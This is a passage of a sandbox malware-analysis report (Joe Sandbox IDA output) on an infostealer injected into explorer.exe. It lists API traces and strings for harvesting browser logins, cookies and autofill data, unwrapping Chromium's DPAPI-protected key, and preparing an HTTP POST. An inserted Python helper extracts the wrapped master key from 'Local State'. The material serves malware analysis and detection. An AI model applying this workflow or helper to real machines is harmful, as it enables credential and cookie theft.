                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 032730F9
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273103
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0327310A
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273115
                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 032731A4
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 032731D7
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 032732DF
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0327339C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                        • API String ID: 2757140130-4052020286
                                                                        • Opcode ID: cf4c6415fe8f54c249e3d29199ae7b8376e8d8dd2a0e64d5f2e47bc73f6c27f0
                                                                        • Instruction ID: 9a394ad50219a4ab9abff69c2b14fc27cb376033f11d34811045d9e1c3b3caa5
                                                                        • Opcode Fuzzy Hash: cf4c6415fe8f54c249e3d29199ae7b8376e8d8dd2a0e64d5f2e47bc73f6c27f0
                                                                        • Instruction Fuzzy Hash: 3B91E175228342AFD710DF25C844E6FBBE9BFC5744F08492CF6859A290DB74D884CB92

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 03273F0A
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03273F16
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03273F38
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03273F4C
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03273F69
                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 03273F7E
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03273F9B
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03273FB5
                                                                        • FindClose.KERNELBASE(00000000), ref: 03273FC4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                        • String ID: *.*$Local State
                                                                        • API String ID: 3923353463-3324723383
                                                                        • Opcode ID: 105e50522d95e7c664d7e7811985691c64ae417a75030afbd2973aeaf2645a0b
                                                                        • Instruction ID: 6c67dc36457fa644dafc65f5306fc1bc70fec60eb1d51807e9347afff524a046
                                                                        • Opcode Fuzzy Hash: 105e50522d95e7c664d7e7811985691c64ae417a75030afbd2973aeaf2645a0b
                                                                        • Instruction Fuzzy Hash: 2821B3382303466BD710F6319C4CA2FB67CBF85641F0C4529FA52C6181DBB8948996E2
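                                                                        Added example (not code from the sample, from Joe Sandbox, or from Chromium): a stdlib-only Python triage of the Chromium secret-store layout that the two CryptUnprotectData routines above and this "Local State" lookup operate on. It classifies a cookies.encrypted_value or logins.password_value as a raw DPAPI blob, which CryptUnprotectData can open directly, or as a "v10" AES-256-GCM value whose key is the DPAPI-wrapped os_crypt.encrypted_key in Local State, and it extracts that wrapped key. The 3-byte RtlCompareMemory that precedes CryptUnprotectData in the routines above is consistent with such a prefix test; this example illustrates the format and makes no claim about the sample's exact branch logic. The Local State JSON and all blob bytes are constructed here; no real key or secret is involved.

```python
"""Triage helpers for the Chromium secret-store formats (Local State,
'Login Data', 'Cookies') named by the report's API and string evidence.

Added example for this report, not the sample's code. Layouts follow
Chromium's os_crypt formats on Windows; all sample data is constructed."""
import base64
import json

# Every DPAPI blob starts with version 1 and the DPAPI provider GUID.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
# Chromium >= 80 prefixes AES-GCM values with "v10" on Windows ("v11" on Linux).
AESGCM_PREFIXES = (b"v10", b"v11")
# os_crypt.encrypted_key = base64("DPAPI" + DPAPI blob wrapping the 32-byte key)
LOCAL_STATE_KEY_PREFIX = b"DPAPI"
GCM_NONCE_LEN, GCM_TAG_LEN = 12, 16

# The queries the report recovered from the injected code's strings.
SQL_COOKIES = "SELECT host_key,path,is_secure,name,encrypted_value FROM cookies"
SQL_LOGINS = "SELECT origin_url,username_value,password_value FROM logins"


def classify_encrypted_value(blob: bytes) -> str:
    """How a cookies.encrypted_value / logins.password_value is protected.
    'aes-gcm': needs the Local State master key (itself DPAPI-wrapped).
    'dpapi':   a raw DPAPI blob, openable with CryptUnprotectData alone,
               which is the branch the report shows ending in that API."""
    if blob[:3] in AESGCM_PREFIXES:
        return "aes-gcm"
    if blob.startswith(DPAPI_BLOB_MAGIC):
        return "dpapi"
    return "unknown"


def split_aesgcm_value(blob: bytes) -> tuple:
    """Split a 'v10' value into (nonce, ciphertext, tag); no decryption."""
    if classify_encrypted_value(blob) != "aes-gcm":
        raise ValueError("not a v10/v11 value")
    body = blob[3:]
    if len(body) < GCM_NONCE_LEN + GCM_TAG_LEN:
        raise ValueError("truncated value")
    nonce = body[:GCM_NONCE_LEN]
    ciphertext, tag = body[GCM_NONCE_LEN:-GCM_TAG_LEN], body[-GCM_TAG_LEN:]
    return nonce, ciphertext, tag


def wrapped_master_key_from_local_state(local_state_json: str) -> bytes:
    """Pull os_crypt.encrypted_key out of Local State and strip the 'DPAPI'
    tag, leaving the DPAPI blob a stealer hands to CryptUnprotectData."""
    data = json.loads(local_state_json)
    raw = base64.b64decode(data["os_crypt"]["encrypted_key"])
    if not raw.startswith(LOCAL_STATE_KEY_PREFIX):
        raise ValueError("encrypted_key lacks DPAPI prefix")
    blob = raw[len(LOCAL_STATE_KEY_PREFIX):]
    if not blob.startswith(DPAPI_BLOB_MAGIC):
        raise ValueError("encrypted_key is not a DPAPI blob")
    return blob


# Constructed sample data (not from the sample or from any real machine).
FAKE_DPAPI_BLOB = DPAPI_BLOB_MAGIC + bytes(range(20))
CONSTRUCTED_LOCAL_STATE = json.dumps({"os_crypt": {"encrypted_key": base64.b64encode(
    LOCAL_STATE_KEY_PREFIX + FAKE_DPAPI_BLOB).decode()}})
CONSTRUCTED_V10_VALUE = b"v10" + b"\x00" * GCM_NONCE_LEN + b"\xaa" * 5 + b"\xbb" * GCM_TAG_LEN

if __name__ == "__main__":
    print(classify_encrypted_value(CONSTRUCTED_V10_VALUE), classify_encrypted_value(FAKE_DPAPI_BLOB))
    print(wrapped_master_key_from_local_state(CONSTRUCTED_LOCAL_STATE).hex())
```

                                                                        The practical use is scoping: a "dpapi" classification means a single CryptUnprotectData call in the user's context recovers the secret, so any process doing that against a copied browser database is the event to alert on; "aes-gcm" values additionally require the Local State file, which is why the directory walk above matches "Local State" by name.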

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 03272B3D
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03272B63
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03272B7B
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 03272BE7
                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 03272C16
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03272C43
                                                                        • FindClose.KERNELBASE(00000000), ref: 03272C52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                        • API String ID: 1108783765-3717368146
                                                                        • Opcode ID: 598a19ce566365455abcec06469f832b1991efa11ff6767415166d5169a84d8b
                                                                        • Instruction ID: 3dfe6c77fb98a39f67b8673e550498dcd5d20fd8c41704425765e262ab18c5e2
                                                                        • Opcode Fuzzy Hash: 598a19ce566365455abcec06469f832b1991efa11ff6767415166d5169a84d8b
                                                                        • Instruction Fuzzy Hash: 9531B734334355CBDB14FB715848A3E72DABFC4600B084E2CE856D7245DBB9D9C69252

                                                                        APIs
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03271DA9
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03271DCF
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03271DE7
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 03271E62
                                                                          • Part of subcall function 03271CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,03272C27), ref: 03271D02
                                                                          • Part of subcall function 03271CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 03271D0D
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03271E94
                                                                        • FindClose.KERNELBASE(00000000), ref: 03271EA3
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 232625764-1692270452
                                                                        • Opcode ID: 1ee9ae9bd52010c8a6876952d3e5ccbacc125b686016a065b1a6b3bdf4e26b3c
                                                                        • Instruction ID: 90423cbd849df7a54cd9dd86644a4612cacf561d6aad973f6530617ec74df3b8
                                                                        • Opcode Fuzzy Hash: 1ee9ae9bd52010c8a6876952d3e5ccbacc125b686016a065b1a6b3bdf4e26b3c
                                                                        • Instruction Fuzzy Hash: 1031BA343343429BCB20FB349888A7F76E9BFC4240F08462DE94697244DB75E8D58792

                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                          • Part of subcall function 03271C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03273E1E,00000000,?,03273FA8), ref: 03271C46
                                                                          • Part of subcall function 03271C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,03273FA8), ref: 03271C56
                                                                          • Part of subcall function 03271C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03273FA8), ref: 03271C76
                                                                          • Part of subcall function 03271C31: CloseHandle.KERNELBASE(00000000,?,03273FA8), ref: 03271C91
                                                                          • Part of subcall function 03272FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03273E30,00000000,00000000,?,03273FA8), ref: 03272FC1
                                                                          • Part of subcall function 03272FB1: lstrlen.KERNEL32("encrypted_key":",?,03273FA8), ref: 03272FCE
                                                                          • Part of subcall function 03272FB1: StrStrIA.SHLWAPI("encrypted_key":",032C692C,?,03273FA8), ref: 03272FDD
                                                                          • Part of subcall function 0327123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03273E4B,00000000), ref: 0327124A
                                                                          • Part of subcall function 0327123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03271268
                                                                          • Part of subcall function 0327123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03271295
                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 03273E74
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03273E9E
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                        • API String ID: 3076719866-957854035
                                                                        • Opcode ID: b1dea9ffc24e0ca37e074e62f56d80e3f11cd326bd8f77f4e318f1d5b319b4a3
                                                                        • Instruction ID: 80052907c1cf8bcbd99bb27fbcb7f26825f3d8122c20e9316c430ff27e096c8c
                                                                        • Opcode Fuzzy Hash: b1dea9ffc24e0ca37e074e62f56d80e3f11cd326bd8f77f4e318f1d5b319b4a3
                                                                        • Instruction Fuzzy Hash: D621C3766343465BD711EA698880ABFF2DDBF84600F48092DE941CB200EBB4D98997D3
                                                                        APIs
                                                                          • Part of subcall function 03271162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0327116F
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03274BB6
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03274BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                        • String ID:
                                                                        • API String ID: 1675517319-0
                                                                        • Opcode ID: eafdec0fc7f19011f97f9b9af827ab48e2624d8fb6f2ce7f9d71c269c1d8bd9f
                                                                        • Instruction ID: cfd65dcfd44cd013ef0f1e20a48e497e2ab7c17e04dbbcc676b3dddce5e8068f
                                                                        • Opcode Fuzzy Hash: eafdec0fc7f19011f97f9b9af827ab48e2624d8fb6f2ce7f9d71c269c1d8bd9f
                                                                        • Instruction Fuzzy Hash: C4E0DF31D31320ABC658FB32BC0CE5B3B9CBF81361F14C969E1659A084CB758C908A61
                                                                        APIs
                                                                        • GetSystemInfo.KERNELBASE(032D20A4,00000001,00000000,0000000A,032C3127,032728DA,00000000,?), ref: 0327BFFC
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem
                                                                        • String ID:
                                                                        • API String ID: 31276548-0
                                                                        • Opcode ID: 7a5d522b96fb8f22afc0bd8d740a7e9c85f56fab4978e192cffb434d12429d59
                                                                        • Instruction ID: 7bcb0fa90d6c3d54893c9055732742846d03b1992585f0803e02008e1212d647
                                                                        • Opcode Fuzzy Hash: 7a5d522b96fb8f22afc0bd8d740a7e9c85f56fab4978e192cffb434d12429d59
                                                                        • Instruction Fuzzy Hash: BFE092797B4B0138F650F6F87C06F0E15456B80F40F608911B628AC8CACBF5A0D06422

                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03273C6A
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273C76
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 03273C7D
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273C89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 03273D2F
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273D36
                                                                        • wsprintfA.USER32 ref: 03273D55
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273D61
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273D89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03273DB2
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03273DED
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                        • API String ID: 2923052733-3488123210
                                                                        • Opcode ID: 5ca8a36496799bf0a964992cdcfc8f9f8fe87aa565d0a77d5d4a4df7ac608bf4
                                                                        • Instruction ID: 85baf7f34ef222f97ab74caad0692598f17e4016d4e0e1c86e824497ae637a58
                                                                        • Opcode Fuzzy Hash: 5ca8a36496799bf0a964992cdcfc8f9f8fe87aa565d0a77d5d4a4df7ac608bf4
                                                                        • Instruction Fuzzy Hash: D741B2386243426BD710FB719C84E3F77ADFF85644F04482CF945AB241DB75D88197A2

                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03272AD2
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 032729E1
                                                                        • lstrlen.KERNEL32(00000000), ref: 032729EC
                                                                        • wsprintfA.USER32 ref: 03272A38
                                                                        • lstrlen.KERNEL32(00000000), ref: 03272A44
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 03272A6C
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 03272A99
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                        • API String ID: 304071051-2605711689
                                                                        • Opcode ID: ee75efd7a9866569dc7ecc975379ee175747c16f3bc471c29c9e6bcc4d5f9be7
                                                                        • Instruction ID: e6ef7b60c316eaca357ce504983a3573b5d030742f5b47ae146734c2f694b85b
                                                                        • Opcode Fuzzy Hash: ee75efd7a9866569dc7ecc975379ee175747c16f3bc471c29c9e6bcc4d5f9be7
                                                                        • Instruction Fuzzy Hash: 5151D034624387DBC725EF319850A3FB7DABF89604F084C2DF8819B252DB75E8898752

                                                                        APIs
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 03272D13
                                                                        • StrStrIW.SHLWAPI(00000000,Profile), ref: 03272D45
                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,Path,032C637C,?,00000FFF,?), ref: 03272D68
                                                                        • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 03272D7B
                                                                        • lstrlenW.KERNEL32(00000000), ref: 03272DD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                                                        • API String ID: 2234428054-4107377610
                                                                        • Opcode ID: e2f1a953709a02ff849acbf8699ec6777dc34310041d99a51a363d48a953b246
                                                                        • Instruction ID: 5ba60ec6ee74f858843fe452ef5bfcf213984551e5a7ec445c200eb7b7ad578c
                                                                        • Opcode Fuzzy Hash: e2f1a953709a02ff849acbf8699ec6777dc34310041d99a51a363d48a953b246
                                                                        • Instruction Fuzzy Hash: CA318F34734342DBC714FF31985463FB6A2BFC9600F08482DE946AB281DBB599D69792

                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                          • Part of subcall function 0327106C: lstrlen.KERNEL32(03587366,00000000,00000000,00000000,03271366,75918A60,03587366,00000000), ref: 03271074
                                                                          • Part of subcall function 0327106C: MultiByteToWideChar.KERNEL32(00000000,00000000,03587366,00000001,00000000,00000000), ref: 03271086
                                                                          • Part of subcall function 032712A3: RtlZeroMemory.NTDLL(?,00000018), ref: 032712B5
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 032713C2
                                                                        • wsprintfW.USER32 ref: 032714B5
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 03271594
                                                                        Strings
                                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 032714FB
                                                                        • Accept: */*Referer: %S, xrefs: 032714AF
                                                                        • POST, xrefs: 03271465
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                        • API String ID: 3833683434-704803497
                                                                        • Opcode ID: 4311ba9cfc27f73f105e55b422bafee6e6c1b9de818cc2182b9c8ca5d5148bb1
                                                                        • Instruction ID: 50b5a71cd00db875e617def98f2c1ebb4ebc9fdaa1429afc9dc5befde5070016
                                                                        • Opcode Fuzzy Hash: 4311ba9cfc27f73f105e55b422bafee6e6c1b9de818cc2182b9c8ca5d5148bb1
                                                                        • Instruction Fuzzy Hash: 21719B74628341AFD714EF64D888A2BBBE9FF88744F08492DF991C7341DBB0E9548B52

                                                                         Control-flow Graph: function 0327B1E5-0327B3F0; its blocks call 0327AEEA, 0327AE65, 0327A7AE, 03276A5A, 0327A1C6, 0327A67C, CreateFileMappingW and MapViewOfFile
                                                                        APIs
                                                                        • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 0327B31D
                                                                        • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 0327B34F
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$CreateMappingView
                                                                        • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                        • API String ID: 3452162329-3826999013
                                                                        • Opcode ID: 5098926d098fc65d7ad473e5e7e94d3079facf328b8a64f2b44bc135ef747346
                                                                        • Instruction ID: bf10a527c8c04116aa3230afa3b51e12d519dbf27b560be88340871cf6c3cc59
                                                                        • Opcode Fuzzy Hash: 5098926d098fc65d7ad473e5e7e94d3079facf328b8a64f2b44bc135ef747346
                                                                        • Instruction Fuzzy Hash: 9C51E475620742DFDB25DF18C844A6BB7E5FF84314F04882EE8428B740DBB0E895CB91

                                                                         Control-flow Graph: function 0327A40E-0327A553; its blocks call 0327A2AA, 0327A250, 0327A1C6, memcpy, ReadFile and memset
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$FileReadmemset
                                                                        • String ID: winRead
                                                                        • API String ID: 2051157613-2759563040
                                                                        • Opcode ID: a5ea454c1850742f2814d5605bb6c5e6d3012a12b31220df166803b9c0ddb188
                                                                        • Instruction ID: dc25b244500f6886331114ca8f4e17995af7439c50cab5f3b79ad1b8a1132dc8
                                                                        • Opcode Fuzzy Hash: a5ea454c1850742f2814d5605bb6c5e6d3012a12b31220df166803b9c0ddb188
                                                                        • Instruction Fuzzy Hash: 3D31CE72625341AFC740DE18CC9489FB7EAFFC4360F885928F89597310D271EC848B92

                                                                        APIs
                                                                        • StrStrIW.KERNELBASE(?,?), ref: 03272E4B
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 03272EE4
                                                                        • RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 03272F54
                                                                        • RegCloseKey.KERNELBASE(?), ref: 03272F62
                                                                          • Part of subcall function 032719E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A1E
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A3C
                                                                          • Part of subcall function 032719E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 03271A75
                                                                          • Part of subcall function 032719E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,03271AE2,PortNumber,00000000,00000000), ref: 03271A98
                                                                          • Part of subcall function 03271BC5: lstrlenW.KERNEL32(00000000,00000000,?,03272E75,PathToExe,00000000,00000000), ref: 03271BCC
